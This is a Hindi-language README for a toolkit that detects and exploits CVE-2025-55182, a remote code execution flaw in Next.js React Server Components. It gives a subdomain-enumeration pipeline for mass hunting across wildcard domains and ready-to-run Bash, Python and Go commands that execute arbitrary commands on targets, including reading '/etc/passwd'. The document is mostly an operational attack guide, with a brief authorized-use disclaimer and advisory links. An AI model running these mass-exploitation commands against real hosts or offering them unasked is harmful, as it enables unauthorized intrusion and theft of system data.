
उच्च-निष्ठा RCE स्कैनर CVE-2025-55182 को प्रभावित करने वाले Next.js RSC के लिए। बड़े पैमाने पर स्कैनिंग, कमांड निष्पादन और स्वचालित recon पाइपलाइनों का समर्थन करता है। पेंटेस्टर्स, शोधकर्ताओं और बाउंटी हंटर्स के लिए बनाया गया।
CVE-2025-55182 का पता लगाने और शोषण करने के लिए एक व्यापक टूलकिट, जो React Server Components का उपयोग करने वाले Next.js अनुप्रयोगों में एक क्रिटिकल रिमोट कोड एक्ज़ीक्यूशन भेद्यता है।
इस रिपॉजिटरी में एक एकीकृत Bash स्कैनर (सिंगल और मास मोड), Python/Go कार्यान्वयन, और एक बग बाउंटी रिकॉनिसेंस वर्कफ़्लो शामिल है।

वाइल्डकार्ड डोमेन पर बड़े पैमाने पर हंटिंग के लिए, स्कैनिंग से पहले लक्ष्यों को फ़िल्टर करने के लिए इस पाइपलाइन का उपयोग करें:
# 1. Enumerate subdomains
subfinder -dL wildcards.txt -all -recursive > subs.txt
# 2. Filter for live hosts
httpx -l subs.txt -o live.txt
# 3. Pre-scan detection using Nuclei (optional)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt
scanner.sh स्क्रिप्ट सिंगल टार्गेट स्कैन और फ़ाइल सूची से मास स्कैनिंग का समर्थन करती है।
chmod +x scanner.sh
वर्बोज़ आउटपुट के साथ किसी विशिष्ट लक्ष्य को सत्यापित करने के लिए सर्वोत्तम।
# Basic check (defaults to "id")
./scanner.sh -d example.com
# Execute custom command
./scanner.sh -d https://target.com -c "cat /etc/passwd"
URLs की सूची को कुशलतापूर्वक स्कैन करता है और कमजोर होस्ट को एक फ़ाइल में सहेजता है।
# Scan a list of URLs
./scanner.sh -l live.txt -c "whoami"
# Custom output file
./scanner.sh -l live.txt -o my_bounty.txt
यदि आपको Bash में विशेष वर्णों को एस्केप करने में समस्या होती है तो इसका उपयोग करें।
pip install requests
python3 python/exploit.py -u http://target.com -c "uname -a"
उच्च प्रदर्शन, न्यूनतम निर्भरताएँ।
go run go/main.go -u http://target.com -c "id"
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com
यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है। अनधिकृत उपयोग सख्ती से अवैध है। डेवलपर इस प्रोग्राम के दुरुपयोग या इससे होने वाली क्षति के लिए कोई देयता नहीं मानता है।
NVD CVE विवरण: https://nvd.nist.gov/vuln/detail/CVE-2025-55182
React सुरक्षा सलाह (React Server Components भेद्यता): https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
ProjectDiscovery Nuclei टेम्पलेट: https://cloud.projectdiscovery.io/library/CVE-2025-55182
| Flag | Description |
|---|
-d, --domain | सिंगल टार्गेट URL |
-l, --list | URLs की सूची वाली फ़ाइल |
-c, --command | निष्पादित करने का कमांड (डिफ़ॉल्ट: id) |
-o, --output | कमजोर होस्ट के लिए आउटपुट फ़ाइल (डिफ़ॉल्ट: vulnerable_hosts.txt) |